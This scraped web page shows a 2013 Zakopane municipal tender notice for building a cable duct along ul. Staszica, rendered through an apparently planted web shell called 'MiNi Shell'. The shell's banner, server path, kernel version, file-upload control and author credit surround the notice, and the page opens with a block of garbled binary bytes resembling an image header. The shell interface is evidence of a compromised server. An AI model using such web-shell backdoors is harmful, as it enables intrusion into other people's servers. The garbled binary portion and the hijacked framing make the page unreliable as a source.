JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130218/25507-N-2013.html

<p class="kh_header"><b>Zakopane: BZP.271.13.2013 wykonanie robót budowlanych na zadaniu nr 16/2012 Budowa kanału technologicznego wzdłuż części ul. Staszica w Zakopanem.</b><br>
<b>Numer ogłoszenia: 25507 - 2013; data zamieszczenia: 18.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BZP.271.13.2013 wykonanie robót budowlanych na zadaniu nr 16/2012 Budowa kanału technologicznego wzdłuż części ul. Staszica w Zakopanem..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.Wkonanie robót budowlanych na zadaniu nr 16/2012 Budowa kanału technologicznego wzdłuż części ul. Staszica  obejmujących: budowę ciągu kanalizacji kablowej niskiego napięcia, średniego napięcia i sieci teletechnicznej o długości ok.150 mb.
 Zamawiający informuje, że  zamawiane roboty w przeważającej części wykonywane będą na terenie objętym robotami budowlanymi prowadzonymi przez konsorcjum firm: Przedsiębiorstwo Inżynieryjno-Budowlane i Sieci Sanitarnych ASTEX Sądelski, Łukaszczyk Spółka Jawna oraz PARK-M Spółka z o.o., adres: 34-424 Szaflary, Oś. Za Torem 3 realizujących zadanie nr 45/2011 pod nazwa: Rewitalizacja centrum Miasta Zakopane obejmująca Rewitalizację Parku Miejskiego i Przebudowę Placu Niepodległości w Zakopanem w celu dostosowania do potrzeb mieszkańców i wymogów ruchu turystycznego, dla działania 6.1: Rozwój miast schemat A MRPO. Prace te obejmują przebudowę fragmentu ul. Staszica
Przedmiot zamówienia i zakres robót budowlanych obejmuje w szczególności: 

3.1.	Uzyskanie w imieniu inwestora wszelkich zgód, zezwoleń 
nieujętych na etapie sporządzania dokumentacji technicznej i uzyskiwania zgłoszenia, koniecznych do rozpoczęcia i realizacji robót oraz sporządzenia wszelkich niezbędnych dokumentacji i materiałów, jakie one wymagają.
3.2.	Ustanowienie kierownika budowy odpowiadającego za całość budowy objętej dokumentacją i zgłoszeniem do Starosty Tatrzańskiego.
3.3.	Ustanowienie kierowników robót budowlanych, do których kierowania niezbędne jest posiadanie uprawnień innych niż posiada kierownik budowy.
3.4.	Skoordynowaniu robót z konsorcjum realizującym zdanie rewitalizacji.
3.5.	Wykonaniu robót budowlanych obejmujących:
3.5.1.	wykonanie wykopów,
3.5.2.	montaż studni kablowych
3.5.3.	układanie ciągów rur do studni
3.5.4.	zasypanie wykopów
3.5.5.	wykonanie prac końcowych
3.6.	Sporządzenie dokumentacji powykonawczej, o której mowa w art. 57 Prawa Budowlanego wraz z inwentaryzacją geodezyjna powykonawczą opatrzoną klauzulą przyjęcia do Państwowego Zasobu Geodezyjnego.
    

3.7.	 Wykonawca udzieli  co najmniej 36-cio miesięcznej gwarancji na wykonane 
              roboty budowlane objęte przedmiotowym zamówieniem.

3.8.	Opis przedmiotu zamówienia zawarty jest w załączniku nr 1 do niniejszej 
             siwz na który składa się :
              
               
3.8.1.	projekt budowlany
3.8.2.	projekt wykonawczy
3.8.3.	STWiOR
3.8.4.	przedmiar robót
               
3.9.	Zamawiający dopuszcza możliwość składania ofert równoważnych w zakresie zaproponowanych materiałów i urządzeń przedstawionych w dokumentacji technicznej pod warunkiem, że będą posiadały nie gorsze niż wymagane przez Zamawiającego parametry techniczne i nie będą powodować konieczności przeprojektowania dokumentacji projektowej.

         Zaoferowane urządzenia i materiały równoważne muszą posiadać stosowne, wymagane przepisami prawa atesty lub dopuszczenia do obrotu gospodarczego. W przypadku zaproponowania przez Wykonawcę w ofercie produktów równoważnych, ciężar udowodnienia równoważności zaproponowanego produktu spoczywa na Wykonawcy. W takim przypadku jest on zobowiązany w swojej ofercie wyraźnie zaznaczyć, że proponuje rozwiązanie równoważne oraz załączyć do oferty dokumenty potwierdzające tą równoważność..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.11.13.00-1, 45.23.14.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 11.1	Każdy wykonawca jest zobowiązany wnieść wadium przetargowe    
    w wysokości  5.000,00     zł  ( słownie:  pięć  tysięcy  złotych)
11.2	Wadium może być wnoszone w jednej lub w kilku  następujących formach: 
       11.2.1. pieniądzu;
       11.2.2.poręczeniach bankowych lub poręczeniach spółdzielczej kasy 
                  oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze 
                  poręczeniem pieniężnym;
      11.2.3. poręczeniach bankowych;
      11.2.4. gwarancjach bankowych;
      11.2.5. gwarancjach ubezpieczeniowych;
      11.2.6. poręczeniach udzielanych przez podmioty, o których mowa w art. 6 lit. b ust. 
                5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji   
                 Rozwoju Przedsiębiorczości ((Dz.U z 2007r. Nr 42 poz.275 z późn. zm.) 

11.3.	Wadium przetargowe w  pieniądzu należy wnieść  przelewem na konto Urzędu   
   Miasta Zakopane w PEKAO S.A. w Zakopanem nr:
          85 1240 4748 1111 0000 4871 8666   
    Wadium powinno znajdować się na koncie zamawiającego najpóźniej   
    w terminie składania ofert tj. 12 marca 2013 r. do godz.  12°°
11.4.Wadium wnoszone w pozostałych formach należy złożyć w postaci oryginału,   
        najpóźniej w terminie składania ofert tj. 12 marca 2013 r. do godz. 12°° w  Biurze    
         ds. zamówień publicznych pok. nr 8 (parter).
        
  11.4.1. UWAGA! Nie wolno oryginałów tych dokumentów wkładać do oferty.

  11.5.   Zwrot wadium  
         11.5.1. Zamawiający zwraca wadium  wszystkim wykonawcom niezwłocznie po 
                     wyborze oferty   najkorzystniejszej lub unieważnieniu postępowania, z 
                     wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza , z 
                     zastrzeżeniem ,że  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli 
                     wykonawca w odpowiedzi na  wezwanie, o którym mowa w art. 26 ust. 3ustawy       
                     nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1   
                     ustawy,  lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn 
                     nieleżących po jego stronie. 

      11.5.2. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy który 
                    wycofał ofertę przed upływem terminu składania ofert;
          11.5.3. Zamawiający żąda  ponownego wniesienia wadium przez wykonawcę którym 
                      zwrócono wadium na podstawie ust.1  jeżeli w wyniku  ostatecznego  
                       rozstrzygnięcia protestu jego oferta została  wybrana jako najkorzystniejsza.     
                       Wykonawca wnosi wadium  w terminie określonym przez Zamawiającego.
          11.5.4. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami   
                      wynikającymi z umowy rachunku bankowego, na którym było ono  
                       przechowywane, pomniejszone o koszty prowadzenia rachunku banko?wego   
                       oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany 
                       przez wykonawcę.
         11.5.5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego 
                      oferta została wybrana:
     11.5.5.1. odmówił podpisania umowy w sprawie zamówienia publicznego na 
                    warunkach określonych w ofercie;
     11.5.5.2. nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
              11.5.5.3. zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe    
                             z przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży zgodnie z 
                    art.44 ustawy  stosowne oświadczenie o spełnianiu warunków udziału w 
                     postępowaniu 
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub 
                  nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca wykaże , że w 
                        ciągu ostatnich 5 lat przed upływem terminu składania ofert  a jeżeli okres   
                        prowadzenia działalności jest krótszy w tym okresie wykonał  co najmniej
                        2 roboty o zakresie odpowiadającym swoim rodzajem i wartością robotom 
                       stanowiącym przedmiot zamówienia, tj. 2 roboty o zakresie odpowiadającym swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia tj. robót budowlanych o wartości nie mniejszej niż 50 000 zł każda, obejmujących budowę kablowych podziemnych sieci energetycznych, teletechnicznych, lub kanałów technologicznych pod te sieci,
         
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia  
                       lub  nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone         
                       do  oferty .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży zgodnie z 
                    art.44 ustawy  stosowne oświadczenie o spełnianiu warunków udziału w 
                     postępowaniu 
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub 
                  nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  zostanie uznany za spełniony ,jeżeli  wykonawca wykaże  ,że zapewni  kierowanie budową przez osobę, posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, należące do właściwej Izby Inżynierów Budownictwa, lub odpowiadające wydane na podstawie wcześniej obowiązujących przepisów oraz zapewni kierowanie robotami budowlanymi, do których kierowania kierownik budowy nie posiada uprawnień przez osoby, posiadające uprawnienia budowlane do kierowania robotami w specjalności drogowej lub odpowiadającymi wydanymi na podstawie wcześniejszych przepisów należące do właściwej Izby Inżynierów Budownictwa

Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia   
                           lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone  
                           do oferty .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży zgodnie z 
                    art.44 ustawy  stosowne oświadczenie o spełnianiu warunków udziału w 
                     postępowaniu 
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub 
                  nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca ma załączyć do oferty  wyceniony przedmiar robót określający ceny jednostkowe brutto elementów asortymentu robót. Sporządzony przez Wykonawcę przedmiar ofertowy powinien obejmować, co najmniej wszystkie asortymenty robót wymienione  w przedłożonym przez Zamawiającego przedmiarze. 
Przedmiar dołączony przez Zamawiającego do materiałów przetargowych należy traktować, jako pomocniczy, niezwalniający Wykonawcy od wykonania 
i załączenia do oferty własnego wycenionego przedmiaru zawierającego wszystkie roboty niezbędne do wykonania zadania
W celu oszacowania i wyceny zakresu robót dla potrzeb sporządzenia oferty należy kierować się wynikami szczegółowych wizji terenowych 
i inwentaryzacji własnych oraz staranną analiza dokumentacji załączonej 
do SIWZ .</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>32.	W związku z art. 144 Ustawy Zamawiający informuje, że zmiana postanowień w zawartej umowie może nastąpić w następujących przypadkach:
32.1.	Zmian podwykonawcy, przy pomocy, którego Wykonawca realizuje przedmiot umowy.
32.2.	Rozszerzenie zakresu podwykonawstwa w porównaniu 
do wskazanego w ofercie Wykonawcy.
32.3.	Zmiany osoby  osób wskazanych w umowie, jako kierujących robotami.

32.4.	 Zmiany terminu wykonania umowy o czas opóźnienia, jeżeli takie opóźnienie wystąpi lub będzie miało wpływ na wykonanie przedmiotu umowy w przypadku:
32.4.1.	Zawieszenia robót przez Zamawiającego,
32.4.2.	Szczególnie niesprzyjających warunków atmosferycznych, uniemożliwiających prowadzenie robót zgodnie, z STWiOR.
32.4.3.	Zmian w dokumentacji dokonanych na wniosek Zamawiającego,
32.4.4.	Opóźnienia przekazania terenu realizacji robót,
32.4.5.	Zmiany terminu dokonania odbioru robót przewidzianych w umowie,
32.4.6.	Protestów mieszkańców,
32.4.7.	Odmiennych od przyjętych warunków geotechnicznych.
32.4.8.	Odmiennych od przyjętych warunków terenowych w szczególności istnienia niezinwentaryzowanej, infrastruktury podziemnej sieci, instalacji lub innych niezinwentaryzowanych obiektów budowlanych,
32.4.9.	Ujawnieniem w trakcie prowadzenia prac obiektów lub przedmiotów 
o charakterze archeologicznym, 
32.4.10.	Siły wyższej,
32.4.11.	Przekroczenia ustawowych terminów wydania przez organy administracji lub innych instytucji branżowych (dot. np. linii telekomunikacyjnych, energetycznych) decyzji, zezwoleń, uzgodnień itp.,
32.4.12.	Odmowy wydania przez ww organy wymaganych decyzji, zezwoleń, uzgodnień itp.,

32.5.	Zmiany sposobu realizacji przedmiotu zamówienia w postaci:
32.5.1.	Konieczności realizacji zamówienia przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane 
w specyfikacjach, w przypadku gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem zamówienia,
32.5.2.	Odmiennych od przyjętych w specyfikacjach warunków geotechnicznych skutkujących niemożnością zrealizowania przedmiotu zamówienia przy dotychczasowych założeniach technologicznych,
32.5.3.	Odmiennych od przyjętych w specyfikacjach warunków terenowych 
w szczególności istnienia niezinwentaryzowanej infrastruktury podziemnej sieci, instalacji lub innych niezinwentaryzowanych obiektów budowlanych skutkujących niemożnością zrealizowania przedmiotu zamówienia przy dotychczasowych założeniach technologicznych,
32.5.4.	Konieczności zrealizowania zamówienia przy zastosowaniu innych rozwiązań technicznych ze względu na zmiany obowiązującego prawa,



32.6.	Zmiany dokonane w granicach przewidzianych w ustawie Prawo budowlane wynikające z:
32.6.1.	Wad dokumentacji projektowej.

32.7.	Zmiany wysokości wynagrodzenia - na wskutek rezygnacji 
z wykonania części robót wraz z określeniem maksymalnej wielkości tych robót i określeniem kwoty należnej za tą cześć w granicach udokumentowanego interesu Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Zamówienia  publiczne postępowania poniżej  wartości  art.11.8<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Rozwoju Lokalnego i Inwestycji
Urząd Miasta Zakopane 
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2013 godzina 12:00, miejsce: Biuro ds zamówień publicznych pok.8
Urząd Miasta Zakopane 
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com